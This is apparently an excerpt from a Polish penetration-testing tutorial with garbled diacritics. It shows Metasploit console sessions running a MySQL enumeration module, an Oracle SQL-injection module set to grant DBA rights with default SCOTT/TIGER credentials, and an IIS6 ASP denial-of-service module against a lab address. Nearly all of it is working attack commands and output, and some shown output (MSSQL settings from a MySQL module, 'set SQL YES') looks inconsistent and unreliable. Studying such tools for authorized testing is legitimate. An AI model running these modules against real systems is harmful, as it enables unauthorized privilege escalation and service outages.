Praca z administracyjnymi moduami pomocniczymi

msf > use auxiliary/admin/mysql/mysql_enum

msf  auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the..
   RHOST                      yes       The target address
   RPORT     3306             yes       The target port
   USERNAME                   no        The username to..

msf  auxiliary(mysql_enum) > exploit

[*] Configuration Parameters:
[*]     C2 Audit Mode is Not Enabled
[*]     xp_cmdshell is Enabled
[*]     remote access is Enabled
[*]     allow updates is Not Enabled
[*]     Database Mail XPs is Not Enabled
[*]     Ole Automation Procedures are Not Enabled
[*] Databases on the server: 
[*]     Database name:master
===========================================================

Moduy wstrzyknicia zapytania SQL oraz ataku DoS

msf  auxiliary(dbms_metadata_get_xml) > show options

Module options (auxiliary/sqli/oracle/dbms_metadata_get_xml):

   Name    Current Setting     Required  Description
   ----    ---------------     --------  -----------
   DBPASS  TIGER               yes       The password to..
   DBUSER  SCOTT               yes       The username to..
   RHOST                       yes       The Oracle host.
   RPORT   1521                yes       The TNS port.
   SID     ORCL                yes       The sid to authenticate.
   SQL     GRANT DBA to SCOTT  no        SQL to execute.

msf  auxiliary(dbms_metadata_get_xml) > set RHOST 192.168.56.1
msf  auxiliary(dbms_metadata_get_xml) > set SQL YES

msf  auxiliary(dbms_metadata_get_xml) > run


msf  auxiliary(ms10_065_ii6_asp_dos) > show options

Module options (auxiliary/dos/windows/http/ms10_065_ii6_asp_dos):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  80               yes       The target port
   URI    /page.asp        yes       URI to request
   VHOST                   no        The virtual host name to..

msf  auxiliary(ms10_065_ii6_asp_dos) > set RHOST 192.168.56.1
RHOST => 192.168.56.1
msf  auxiliary(ms10_065_ii6_asp_dos) > run

[*] Attacking http://192.168.56.1:80/page.asp


